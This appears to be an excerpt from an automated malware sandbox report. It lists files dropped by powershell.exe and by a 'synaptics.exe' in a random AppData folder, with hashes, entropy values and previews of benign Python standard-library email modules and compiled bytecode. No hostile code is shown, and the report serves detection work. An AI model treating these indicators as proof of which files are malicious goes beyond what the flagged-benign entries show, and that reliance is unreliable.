                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Various types of useful iterators and generators."""....__all__ = [.. 'body_line_iterator',.. 'typed_subpart_iterator',.. 'walk',.. # Do not include _structure() since it's part of the debugging API... ]....import sys..from io import StringIO.........# This function will become a method of the Message class..def walk(self):.. """Walk over the message tree, yielding each subpart..... The walk is performed in depth-first order. This method is a.. generator... """.. yield self.. if self.is_multipart():.. for subpart in self.get_payload():.. yield from subpart.walk().........# These two functions are imported into the Iterators.py interface module...def body_line_iterator(msg, decode=False):.. """Iterate over the parts, returning string payloads line-by-line..... Optional decode (default False) is passed through to .ge
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48233
                                                                                                                                                                                                            Entropy (8bit):4.389945069848653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykIqfRbIopYv72saLA5/ze9H/9KDiYoeRMqsEC+q6+4xj4UOlZn:ykIqJrp5LA5/zeVlWiYoeRMqsEC+q6+D
                                                                                                                                                                                                            MD5:14F6A07A274A381C6C16336912036DF9
                                                                                                                                                                                                            SHA1:9E44EBD712548E3B4F616AF023577C71C731D7D9
                                                                                                                                                                                                            SHA-256:2A132F508CB491F5D58285B4CDC5F58EB5B7E181E5BDA52683C9E37B3CE1FC9A
                                                                                                                                                                                                            SHA-512:30405248116E788B590B009F27E7395D68543738ACFC2A90FB03F8C4BD07DC5FCB0BFB13A85552E81BCCA8256D4B290A84766CCE38C3C43011F652C96A548EF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Basic message object for the email package object model."""....__all__ = ['Message', 'EmailMessage']....import re..import uu..import quopri..from io import BytesIO, StringIO....# Intrapackage imports..from email import utils..from email import errors..from email._policybase import Policy, compat32..from email import charset as _charset..from email._encoded_words import decode_b..Charset = _charset.Charset....SEMISPACE = '; '....# Regular expression that matches `special' characters in parameters, the..# existence of which force quoting of the parameter value...tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')......def _splitparam(param):.. # Split header parameters. BAW: this may be too simple. It isn't.. # strictly RFC 2045 (section 5.1) compliant, but it catches most headers.. # found in the wild. We may eventually need a full fledged parser... # RDM: w
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1358
                                                                                                                                                                                                            Entropy (8bit):4.663083536091826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXxpwqf12TR2BeEcyA4IkkqaXzoiXIfr2mdzWBVO96eZv8dVbyMlAQwY:fXocsREexyAkiJCoK83zlDZ
                                                                                                                                                                                                            MD5:3694543B1F5BA8545787D841B01B6554
                                                                                                                                                                                                            SHA1:286BD4F89559927558A157A054C01BFCB2271034
                                                                                                                                                                                                            SHA-256:8911432A19145A0F8D3A869BF9D37BD5B1325C148BCC2196859543714F30162A
                                                                                                                                                                                                            SHA-512:D952021F7E76FA9EE3C8E62B7131BDB9D12BFB3DB988E0BC5211A4451E38E1550221785CD1DBF6889BCBE7D081A195D50CE4C9E186494174EA191F448BC4989B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Keith Dart..# Contact: email-sig@python.org...."""Class representing application/* type MIME documents."""....__all__ = ["MIMEApplication"]....from email import encoders..from email.mime.nonmultipart import MIMENonMultipart......class MIMEApplication(MIMENonMultipart):.. """Class for generating application/* MIME documents.""".... def __init__(self, _data, _subtype='octet-stream',.. _encoder=encoders.encode_base64, *, policy=None, **_params):.. """Create an application/* type MIME document..... _data contains the bytes for the raw application data..... _subtype is the MIME content type subtype, defaulting to.. 'octet-stream'..... _encoder is a function which will perform the actual encoding for.. transport of the application data, defaulting to base64 encoding..... Any additional keyword arguments are passed to the base class.. constructor, which
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2813
                                                                                                                                                                                                            Entropy (8bit):4.596181813233121
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:2XVEOsRERHk+hYQSitDqaxOviBvSpCkGuCqspqK8WINl/3XH:2X+OsRERHk8YWt+axOvmSpCGCqHK8W8x
                                                                                                                                                                                                            MD5:032F9685D64F2E7FA6E25478661277B4
                                                                                                                                                                                                            SHA1:EF3D80537F049401798601A14FCAAB47F408B46A
                                                                                                                                                                                                            SHA-256:983C68C0876371A4B4079B94F161AC2F0199A453B28CF3FD7D2D23FFC9908CF4
                                                                                                                                                                                                            SHA-512:F94B1B4285CEFC24055C41C2E197E824FF8B1C92D13E76CB6F5D67083C5F5CA2CD563BF3D0AFCA7FDB33BE542E53E72B23D1D296475880E8313089500BB49340
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Anthony Baxter..# Contact: email-sig@python.org...."""Class representing audio/* type MIME documents."""....__all__ = ['MIMEAudio']....import sndhdr....from io import BytesIO..from email import encoders..from email.mime.nonmultipart import MIMENonMultipart........._sndhdr_MIMEmap = {'au' : 'basic',.. 'wav' :'x-wav',.. 'aiff':'x-aiff',.. 'aifc':'x-aiff',.. }....# There are others in sndhdr that don't have MIME types. :(..# Additional ones to be added to sndhdr? midi, mp3, realaudio, wma??..def _whatsnd(data):.. """Try to identify a sound file type..... sndhdr.what() has a pretty cruddy interface, unfortunately. This is why.. we re-do it here. It would be easier to reverse engineer the Unix 'file'.. command and use the standard 'magic' file, as shipped with a modern Unix... """.. hdr = data[:512].. fakefile = BytesIO(hdr).. for
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):946
                                                                                                                                                                                                            Entropy (8bit):4.87252568068434
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXt+wDEY92ESA2xNa3Xmbztw57PAjIQpDcXN:fXvDEY9sBgmbK5T0Il
                                                                                                                                                                                                            MD5:643733D8FE05FDD29E434355BBE37884
                                                                                                                                                                                                            SHA1:03BFA9094629480466050858CA260DC598955A30
                                                                                                                                                                                                            SHA-256:FD0C74EE4CB66E0AB5F53EF93662C490E7614D25471E70EA5C2F4B8B06B047F4
                                                                                                                                                                                                            SHA-512:E0467CB5B333ACC2BC432623A266080795A8AD15D01093EB14701B1DA294FF1F5F08D6E439C9EC2747075C8AADE45618F1DE2095B2DDED97AFAECA1750862987
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME specializations."""....__all__ = ['MIMEBase']....import email.policy....from email import message.........class MIMEBase(message.Message):.. """Base class for MIME specializations.""".... def __init__(self, _maintype, _subtype, *, policy=None, **_params):.. """This constructor adds a Content-Type: and a MIME-Version: header..... The Content-Type: header is taken from the _maintype and _subtype.. arguments. Additional parameters for this header are taken from the.. keyword arguments... """.. if policy is None:.. policy = email.policy.compat32.. message.Message.__init__(self, policy=policy).. ctype = '%s/%s' % (_maintype, _subtype).. self.add_header('Content-Type', ctype, **_params).. self['MIME-Version'] = '1.0'..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1875
                                                                                                                                                                                                            Entropy (8bit):4.59865181886179
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXt+wql2TR2BAEcbA/kqar9DKSddMMqer2mdhmhGuTWOy05ipqO96eZv8ZVbsl/:fXvqsREAxbR58z9CkGuCqspqK8jYlKk
                                                                                                                                                                                                            MD5:16672CAEC96D7917AAF125DD7276647E
                                                                                                                                                                                                            SHA1:24F2A72C284E3F5DBB7C0BA032A0B5DBF07C1E7B
                                                                                                                                                                                                            SHA-256:EBD84BB4E0B237C8028FD82213B912C45CE6C8F0AC523E6568E615C2026C84AC
                                                                                                                                                                                                            SHA-512:2EA9E30F507F8A5FC7B2A9618E84A8936F890F834E189F9DCF4C5880991537EFBA50C9951DF67663FCA79C0A45D3D3ABF69747A7840112DEA7D4A62CDA632820
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing image/* type MIME documents."""....__all__ = ['MIMEImage']....import imghdr....from email import encoders..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEImage(MIMENonMultipart):.. """Class for generating image/* type MIME documents.""".... def __init__(self, _imagedata, _subtype=None,.. _encoder=encoders.encode_base64, *, policy=None, **_params):.. """Create an image/* type MIME document..... _imagedata contains the bytes for the raw image data. If the data.. can be decoded by the standard Python `imghdr' module, then the.. subtype will be automatically included in the Content-Type header... Otherwise, you can specify the specific image subtype via the _subtype.. parameter..... _encoder is a function which will perform the actual encoding for.. transp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1351
                                                                                                                                                                                                            Entropy (8bit):4.752549320871495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXt+wq72h2BWEHAGaQ+NGPxCB4/IyHIAhlCnIKVbS4XGPxvz/z:fXv8oEWA8Gpn/XoSlCnI4m4XGprz
                                                                                                                                                                                                            MD5:7A30E752AC45C95126D9E4164BEE4DDC
                                                                                                                                                                                                            SHA1:178924C1BE52F2D59A135B5F7D8C6BD7293F2076
                                                                                                                                                                                                            SHA-256:4915FDDEFCC2702D8771DAE38153B5FA2409DC65D1B37E1D09D86B9CCFEACA31
                                                                                                                                                                                                            SHA-512:717896109844010BBC6C47B6A4DB39F2FF04C4215CFC5397CCAAFA67AEE81ADFE487703CC750C988AD33BE4A6BB7FFE93D5C3262C3F20DEC44DB9EE31D05CEB4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing message/* MIME documents."""....__all__ = ['MIMEMessage']....from email import message..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEMessage(MIMENonMultipart):.. """Class representing message/* MIME documents.""".... def __init__(self, _msg, _subtype='rfc822', *, policy=None):.. """Create a message/* type MIME document..... _msg is a message object and must be an instance of Message, or a.. derived class of Message, otherwise a TypeError is raised..... Optional _subtype defines the subtype of the contained message. The.. default is "rfc822" (this is defined by the MIME standard, even though.. the term "rfc822" is technically outdated by RFC 2822)... """.. MIMENonMultipart.__init__(self, 'message', _subtype, policy=policy).. if not isinstance(_msg, message.Mes
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1669
                                                                                                                                                                                                            Entropy (8bit):4.575907077936182
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QVXt+wK2TAPQLwAa7qXWgvXlvO1TaHVHeAdrolTOwQXadJny:6XvKwtMVWm6KTiIbT5y
                                                                                                                                                                                                            MD5:78C5928C8D1C5B8C54AFAFB82EE66E44
                                                                                                                                                                                                            SHA1:5374AFAB02EFE45CA721E84F70E973BDD426C2ED
                                                                                                                                                                                                            SHA-256:804CC010C1AB4D5230A6B56E31167421908B9BCA265A7E0BB516BA34A8C1B6F2
                                                                                                                                                                                                            SHA-512:2B348B3246E60DE9943E8FCA20A166402AAC62EB3ABF290AC18A9368F07AAFDC25DA31F84C9C0E2CCFC5C12AFA77CD8689E638A3629E2E378A92CFF3BCAC7A84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME multipart/* type messages."""....__all__ = ['MIMEMultipart']....from email.mime.base import MIMEBase.........class MIMEMultipart(MIMEBase):.. """Base class for MIME multipart/* type messages.""".... def __init__(self, _subtype='mixed', boundary=None, _subparts=None,.. *, policy=None,.. **_params):.. """Creates a multipart/* type message..... By default, creates a multipart/mixed message, with proper.. Content-Type and MIME-Version headers..... _subtype is the subtype of the multipart content type, defaulting to.. `mixed'..... boundary is the multipart boundary string. By default it is.. calculated as needed..... _subparts is a sequence of initial subparts for the payload. It.. must be an iterable object, such as a list. You can always.. attach
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):713
                                                                                                                                                                                                            Entropy (8bit):4.822289099304847
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:QcbcX920v+bUK5adORDruY23/2ub4WliK1ZPCYpBYiXaMohOWTn:QVXt+wRA2v27K1Z5BLaXYWT
                                                                                                                                                                                                            MD5:5A28752E8A554879414A02D5D648EA84
                                                                                                                                                                                                            SHA1:3F9FD11DE698EAAB753991C7253C0FF762656D5A
                                                                                                                                                                                                            SHA-256:F6493F0506DF33DDC4B6B349BC1280BA374D4DB6E86F43411BC98A062640933F
                                                                                                                                                                                                            SHA-512:6F7F3FB449A47B91BAB42368CEEC5219370C90887A342126B4C1CFE5B8327488A772E4648C599A1A6B7BF282A0B50E29AC620B7C71ED6F80A09068B0A6A705B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME type messages that are not multipart."""....__all__ = ['MIMENonMultipart']....from email import errors..from email.mime.base import MIMEBase.........class MIMENonMultipart(MIMEBase):.. """Base class for MIME non-multipart type messages.""".... def attach(self, payload):.. # The public API prohibits attaching multiple subparts to MIMEBase.. # derived subtypes since none of them are, by definition, of content.. # type multipart/*.. raise errors.MultipartConversionError(.. 'Cannot attach additional subparts to non-multipart/*')..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1479
                                                                                                                                                                                                            Entropy (8bit):4.669713874420808
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QUXt+wqvdN2/g2BXUEcUd6A0I+96FuW6MZ7jP56rbQb71WBMq3EVsYpBNGpAn7t7:fXvaFEExPTU6MZHB63QbgxEVxpbGpWp7
                                                                                                                                                                                                            MD5:E9B16E7B5E7426500F70C0EC09224EE4
                                                                                                                                                                                                            SHA1:DC8F36213042123C9181119D6F00AA6F65A542CB
                                                                                                                                                                                                            SHA-256:6DB0003D37C87360177BA09299D3F4C3AE4D051389D6C6F997E38149C496624A
                                                                                                                                                                                                            SHA-512:A27F295C1CDE4ED496B7336F1FB107791E2B0DB4EA86DBD60C047722612FBB9150A4718F1C27B80BD73A910AB6F41EC15A5CEB8112410EEF39F3763858AC8B04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing text/* type MIME documents."""....__all__ = ['MIMEText']....from email.charset import Charset..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEText(MIMENonMultipart):.. """Class for generating text/* type MIME documents.""".... def __init__(self, _text, _subtype='plain', _charset=None, *, policy=None):.. """Create a text/* type MIME document..... _text is the string for this message object..... _subtype is the MIME sub content type, defaulting to "plain"..... _charset is the character set parameter added to the Content-Type.. header. This defaults to "us-ascii". Note that as a side-effect, the.. Content-Transfer-Encoding header will also be set... """.... # If no _charset was specified, check to see if there are non-ascii.. # characters present. If not, use 'us
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5172
                                                                                                                                                                                                            Entropy (8bit):4.459621934961514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:2XyKLTo1bb9AHs5ofboK7bG7RGTBMnM4xBw3X1aFFGawps2/fboKhyuRGTjg6DBf:2Xzo1bb9AwOUOGRsUWOonrXUluRQg+0+
                                                                                                                                                                                                            MD5:733C13463BE8E3E9FF0F7F9580F81890
                                                                                                                                                                                                            SHA1:FB513E85F27DAC34AE6D6233A48D118A04C5725B
                                                                                                                                                                                                            SHA-256:2A4247867376B64EE4FD66952F348305AA74EBB5484BC247E0C1D6AD63781B8E
                                                                                                                                                                                                            SHA-512:D3468F37667A47B3601BE4DCB6E7FFC0749A0D0A7673F93073C23D713854B043F0927819D4028EFFF6CB58E16074AC437406B52C625D1E2FD1E00AAEF380CACA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter..# Contact: email-sig@python.org...."""A parser of RFC 2822 and MIME email messages."""....__all__ = ['Parser', 'HeaderParser', 'BytesParser', 'BytesHeaderParser',.. 'FeedParser', 'BytesFeedParser']....from io import StringIO, TextIOWrapper....from email.feedparser import FeedParser, BytesFeedParser..from email._policybase import compat32......class Parser:.. def __init__(self, _class=None, *, policy=compat32):.. """Parser of RFC 2822 and MIME email messages..... Creates an in-memory object tree representing the email message, which.. can then be manipulated and turned over to a Generator to return the.. textual representation of the message..... The string must be formatted as a block of RFC 2822 headers and header.. continuation lines, optionally preceded by a `Unix-from' header. The.. header block is terminated ei
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10607
                                                                                                                                                                                                            Entropy (8bit):4.3396219054495955
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Qv6SMMmTGSigeS0LiEUjoEfgT78kskc5UeKEaYpw9x5bTCBa:Qv6jvTGOvPovT78KeKEbe97TCE
                                                                                                                                                                                                            MD5:B50D054F2BAF51C93F864FC45ED046BC
                                                                                                                                                                                                            SHA1:54D6B86D09ABE1A2EE1D15C57E9B9E31007C12A6
                                                                                                                                                                                                            SHA-256:44B91E9F5D7B510EF085F426DAA6454FB339EA46ED8AC5302EDF84FFE4F9F3A7
                                                                                                                                                                                                            SHA-512:6FB8EC11F4BF196F1EC74EC874ADD8193AD6FF571D471177F60923333D8B3D58BB1B9BD3C510D1AED68A82E71426CC17839F741137696B9D13BADE11E0465A49
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""This will be the home for the policy that hooks in the new..code that adds all the email6 features..."""....import re..import sys..from email._policybase import Policy, Compat32, compat32, _extend_docstrings..from email.utils import _has_surrogates..from email.headerregistry import HeaderRegistry as HeaderRegistry..from email.contentmanager import raw_data_manager..from email.message import EmailMessage....__all__ = [.. 'Compat32',.. 'compat32',.. 'Policy',.. 'EmailPolicy',.. 'default',.. 'strict',.. 'SMTP',.. 'HTTP',.. ]....linesep_splitter = re.compile(r'\n|\r')....@_extend_docstrings..class EmailPolicy(Policy):.... """+.. PROVISIONAL.... The API extensions enabled by this policy are currently provisional... Refer to the documentation for details..... This policy adds new header parsing and folding algorithms. Instead of.. simple strings, headers are custom objects with custom attributes.. depending on the type of the field. The fo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10157
                                                                                                                                                                                                            Entropy (8bit):4.8052020140652525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:/3mMHQE/phvw+cxdP6AwkAZFAFx6Rr7qsXDTFaUf/B2m/fbweCMBsTmam8k2LHd:/t/phvEHzw9ZFAArbXDTvXC4sTcA
                                                                                                                                                                                                            MD5:91E0134C7993B62DF821299CBFE9CF20
                                                                                                                                                                                                            SHA1:3E647D829457FC8E76B5D36ED31AFF8F383B004F
                                                                                                                                                                                                            SHA-256:0AC88715C424E80122E3D861BBACC20EE289562F2C685AEFE40B88471515A1BD
                                                                                                                                                                                                            SHA-512:DCC68CED12BC04DC7643FE0B636AF764D7136ED203EB1E74E2B669ED6349E62F5FB6022CC86DC03B4824DFB1E8EF5D59EE648DC9D015A0A44641B6CD01EB22D4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Ben Gertzfield..# Contact: email-sig@python.org...."""Quoted-printable content transfer encoding per RFCs 2045-2047.....This module handles the content transfer encoding method defined in RFC 2045..to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to..safely encode text that is in a character set similar to the 7-bit US ASCII..character set, but that includes some 8-bit characters that are normally not..allowed in email bodies or headers.....Quoted-printable is very space-inefficient for encoding binary files; use the..email.base64mime module for that instead.....This module provides an interface to encode and decode both headers and bodies..with quoted-printable encoding.....RFC 2045 defines a method for including character set information in an..`encoded-word' in a header. This method is commonly used for 8-bit real names..in To:/From:/Cc: etc. fields, as well as Subject: lines.....This module do
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13793
                                                                                                                                                                                                            Entropy (8bit):4.70387477489613
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:+GXDPOM1Dlx0rReFY2yHhDYlYZInHfrVDVw:+GXDPOC/0rz7HhDYF/rg
                                                                                                                                                                                                            MD5:AE01B00B737EEB26F6B1A7F13FD5E07A
                                                                                                                                                                                                            SHA1:2CD748C706A7B3A7AB9D7B930BEA3DFA05B219D1
                                                                                                                                                                                                            SHA-256:521840D2F6A4500BABAF7DF27A2B1FED2E05AC0350BAF367D5454C09ACBEE525
                                                                                                                                                                                                            SHA-512:987BCF23CF619BD279C32DC2A70F5F3355300B825D6AF185EF615B6E43361F346B823F74D1234F54441D838B1C7FFEA152275A2E5724F56A6FD7A931510DBE59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Miscellaneous utilities."""....__all__ = [.. 'collapse_rfc2231_value',.. 'decode_params',.. 'decode_rfc2231',.. 'encode_rfc2231',.. 'formataddr',.. 'formatdate',.. 'format_datetime',.. 'getaddresses',.. 'make_msgid',.. 'mktime_tz',.. 'parseaddr',.. 'parsedate',.. 'parsedate_tz',.. 'parsedate_to_datetime',.. 'unquote',.. ]....import os..import re..import time..import random..import socket..import datetime..import urllib.parse....from email._parseaddr import quote..from email._parseaddr import AddressList as _AddressList..from email._parseaddr import mktime_tz....from email._parseaddr import parsedate, parsedate_tz, _parsedate_tz....# Intrapackage imports..from email.charset import Charset....COMMASPACE = ', '..EMPTYSTRING = ''..UEMPTYSTRING = ''..CRLF = '\r\n'..TICK = "'"....specialsre = re.compile(r'[][\\()<>@,:;".]')..escap
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3899
                                                                                                                                                                                                            Entropy (8bit):5.53641032832009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:7XLHIYGspF3e06Q0YhQkUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:7XEYLpFkY1U7XYLf5c6+X1Y
                                                                                                                                                                                                            MD5:008472E59C94DC712F33C2457B285574
                                                                                                                                                                                                            SHA1:BB7F26768C9F54021E4CC42F391C7C99D1C52E63
                                                                                                                                                                                                            SHA-256:D8458765E442DBEF4D5385D12E85D4D237FACEAC3075BEA123D40AA3FD44CB2C
                                                                                                                                                                                                            SHA-512:2D5AE2923CC63120E4B7FDC80268D88C54D314C3BF3F9689F1F5435D8CA8B67E4E8A7FF8C37EB081045FC04D81CB422527DAB58CA65B574E78FBD0EC5463B951
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10945
                                                                                                                                                                                                            Entropy (8bit):5.844903978837486
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iIzxOkq4bpehh3qkyR0N:NXG0bueBI6Czx9IX6Ri
                                                                                                                                                                                                            MD5:63D27EC2DCDA47261ADE1CED33A41BB7
                                                                                                                                                                                                            SHA1:F0CCD4ECFB8350ED0769B8B0F4413303B5E18CA8
                                                                                                                                                                                                            SHA-256:5588AA5CED64475F23AC06B5398E82D130AB839FCA3E9B69FAD0219570B1919E
                                                                                                                                                                                                            SHA-512:82F92C1299D9BEC0FE8A7784B12A694EDAB6B8DC5654D9BB18A01CD48CDA0ECA837838B36129A38FF7E51EC4A8012C6D4A348917F441DC7E5D44B2B6B47CDC75
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
